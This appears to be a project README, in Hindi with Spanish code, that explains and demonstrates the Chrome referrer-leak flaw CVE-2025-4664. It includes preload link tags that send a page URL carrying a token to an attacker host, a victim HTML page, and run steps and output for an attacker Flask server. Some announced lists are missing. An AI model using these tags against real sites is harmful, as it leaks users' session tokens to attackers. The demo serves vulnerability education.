
CVE-2025-4664 का शैक्षिक डेमो, एक Chrome लोडर कमजोरी जो रेफरर-पॉलिसी में हेरफेर के माध्यम से क्रॉस-ओरिजिन डेटा लीकेज को सक्षम करती है। इसमें हाथों-हाथ शोषण सिमुलेशन के लिए एक पीड़ित HTML पृष्ठ और हमलावर Flask सर्वर शामिल है।
CVE-2025-4664 भेद्यता Google Chrome के Loader घटक में पहचाना गया एक उच्च-गंभीरता वाला सुरक्षा दोष है, जो संस्करण 136.0.7103.113 से पहले के संस्करणों में मौजूद है। यह समस्या एक दूरस्थ हमलावर को विशेष रूप से डिज़ाइन किए गए HTML पृष्ठ के माध्यम से क्रॉस-ऑरिजिन डेटा को लीक करने की अनुमति देती है, जो सत्र टोकन या प्रमाणीकरण क्रेडेंशियल जैसी संवेदनशील जानकारी से समझौता कर सकती है।
यह दोष Chrome के Loader घटक में सुरक्षा नीतियों के अनुचित कार्यान्वयन में निहित है। विशेष रूप से, Chrome उप-संसाधन अनुरोधों (जैसे छवियाँ या स्क्रिप्ट) में HTTP हेडर Link के भीतर referrer-policy निर्देश की व्याख्या करता है, भले ही अन्य ब्राउज़र ऐसा न करें। एक हमलावर unsafe-url जैसी कम प्रतिबंधात्मक नीति सेट करके इसका फायदा उठा सकता है, जिससे Chrome पूर्ण URL (संवेदनशील पैरामीटर सहित) को हमलावर-नियंत्रित डोमेन पर लीक कर देता है।
इस भेद्यता का वास्तविक वातावरण में सक्रिय रूप से शोषण किया गया है, जिसके कारण अमेरिकी साइबर सुरक्षा और बुनियादी ढांचा सुरक्षा एजेंसी (CISA) ने इसे अपने ज्ञात और शोषित भेद्यताओं की सूची (KEV) में शामिल किया है। CISA ने संघीय एजेंसियों के लिए संबंधित सुधार लागू करने की अंतिम तिथि 5 जून 2025 निर्धारित की है।
Google ने इस भेद्यता को ठीक करने के लिए निम्नलिखित संस्करणों में अद्यतन जारी किए हैं:
सभी उपयोगकर्ताओं को दृढ़ता से सलाह दी जाती है कि वे अपने Chrome ब्राउज़र को उपलब्ध नवीनतम संस्करण में अपडेट करें। अद्यतन की जाँच और लागू करने के लिए:
इसके अलावा, Microsoft Edge, Brave, Opera और Vivaldi जैसे Chromium-आधारित ब्राउज़रों के उपयोगकर्ताओं को संबंधित अद्यतनों पर नज़र रखनी चाहिए, क्योंकि वे इस भेद्यता से प्रभावित हो सकते हैं।
ब्राउज़र को अद्यतन रखना सक्रिय सुरक्षा खतरों से बचाव और व्यक्तिगत जानकारी की सुरक्षा के लिए आवश्यक है।
भेद्यता CVE-2025-4664 का शोषण Google Chrome द्वारा HTML लिंक से उप-संसाधन (जैसे छवियाँ, स्क्रिप्ट आदि) लोड करते समय संदर्भ नीति (referrer-policy) को संभालने के तरीके में हेरफेर करके किया जाता है।
🌐 दुर्भावनापूर्ण साइट का निर्माण:
हमलावर एक वेबसाइट बनाता है जो अपने HTTP हेडर में इस तरह का एक HTML लिंक शामिल करती है:
<link rel="preload" as="image" href="https://victima.com/imagen.jpg" referrerpolicy="unsafe-url">
🔧 referrer-policy में हेरफेर: अधिकांश ब्राउज़रों में, टैग में यह referrerpolicy लोड किए गए संसाधन पर लागू नहीं होता है। हालाँकि, Chrome इसे लागू करता है, जो समस्या का मूल कारण है।
📤 Referer का लीक होना: जब पीड़ित का ब्राउज़र (Chrome) victima.com से संसाधन लोड करता है, तो वह मूल साइट की पूरी URL को Referer हेडर के रूप में भेजता है, जिसमें शामिल हो सकता है:
<link rel="preload" as="image" href="https://atacante.com/captura.jpg" referrerpolicy="unsafe-url">
जब पीड़ित इस संसाधन तक पहुँचता है, Chrome अपनी पूरी URL को Referer के रूप में हमलावर के सर्वर पर भेजता है।
1- हमलावर पीड़ित को एक लिंक भेजता है:
https://atacante.com/pagina-maliciosa.html
<link rel="preload" as="image" href="https://victima.com/perfil?token=ABC123" referrerpolicy="unsafe-url">
Referer: https://victima.com/perfil?token=ABC123
हमलावर डोमेन पर, टोकन को उजागर करते हुए।

index.html — पीड़ित फ़ाइलयह फ़ाइल हमले के पीड़ित का अनुकरण करती है, यह एक सरलीकृत HTML डेमो है जो दिखाती है कि दुर्भावनापूर्ण टैग का उपयोग करके CVE-2025-4664 भेद्यता का शोषण कैसे किया जा सकता है:
<!DOCTYPE html>
<html lang="es">
<head>
<meta charset="UTF-8">
<title>Demo CVE-2025-4664</title>
<!-- यह संसाधन URL में संवेदनशील जानकारी वाली पीड़ित साइट की ओर इशारा करता है -->
<link rel="preload" as="image"
href="https://victima.com/perfil?token=ABC123"
referrerpolicy="unsafe-url">
</head>
<body>
<h1>Demostración de la vulnerabilidad CVE-2025-4664</h1>
<p>Si estás usando una versión vulnerable de Chrome, el navegador enviará el <strong>Referer completo</strong> a la URL de arriba.</p>
</body>
</html>
servidor_atacante.py — हमलावर फ़ाइलइस स्क्रिप्ट से Python में एक छोटे सर्वर का उपयोग करके Referer को कैप्चर करने के लिए हमले को स्वचालित करना संभव है। यहाँ हमलावर सर्वर का अनुकरण करने के लिए Flask का उपयोग करके एक उदाहरण दिया गया है जो डेटा प्राप्त करता है:
index.html द्वारा दर्शाए गए पीड़ित के विरुद्ध हमले का अनुकरण करता है।pip install flask
python servidor_atacante.py
<link rel="preload" as="image"
href="http://<tu_IP>:8080/captura.jpg"
referrerpolicy="unsafe-url">
<tu_IP> को उस सर्वर के सार्वजनिक या स्थानीय IP से बदलें जो स्क्रिप्ट चला रहा है।
एक टर्मिनल (PowerShell या CMD) खोलें।
फ़ाइल फ़ोल्डर पर नेविगेट करें:
cd "C:\Users\Sebas\Desktop\servidor_atacante"
python servidor_atacante.py
* Running on http://127.0.0.1:8080
* Running on http://192.168.1.35:8080
उसी फ़ोल्डर (C:\Users\Sebas\Desktop\servidor_atacante) में, इस सामग्री के साथ index.html नामक एक फ़ाइल बनाएँ:
<!DOCTYPE html>
<html lang="es">
<head>
<meta charset="UTF-8">
<title>Demo CVE-2025-4664</title>
<!-- हमले का अनुकरण करता है -->
<link rel="preload" as="image"
href="http://192.168.1.35:8080/captura.jpg"
referrerpolicy="unsafe-url">
</head>
<body>
<h1>Simulación CVE-2025-4664</h1>
<p>Este HTML intenta filtrar la URL completa (incluyendo el token) al atacante.</p>
</body>
</html>
✅ महत्वपूर्ण: सुनिश्चित करें कि IP (192.168.1.35) Flask द्वारा दिखाए गए स्थानीय IP से मेल खाता है। यदि अलग है, तो HTML में उसे बदलें।
Chrome खोलें।
एड्रेस बार में टाइप करें:
file:///C:/[Carpeta destino]/servidor_atacante/index.html?token=ABC123
Enter दबाएँ।
📥 सर्वर पर परिणाम देखें Flask कंसोल में आपको कुछ इस तरह दिखना चाहिए:
[+] Referer recibido: file:///C:/[Carpeta destino]/servidor_atacante/index.html?token=ABC123
[Carpeta destino]: इस पैरामीटर को उस स्थान से बदलें जहाँ हमने फ़ाइल सहेजी है।
🎯 इसका मतलब है कि ब्राउज़र ने पूरा Referer हमलावर को भेज दिया!
यह व्याख्या Sebastian Peinador द्वारा शैक्षिक और आक्रामक साइबर सुरक्षा अनुसंधान उद्देश्यों के लिए तैयार की गई है।
यह सामग्री MIT लाइसेंस के तहत वितरित की जाती है।
यदि यह उपयोगी लगे, तो रेपो को ⭐ देना या इसे साझा करना न भूलें!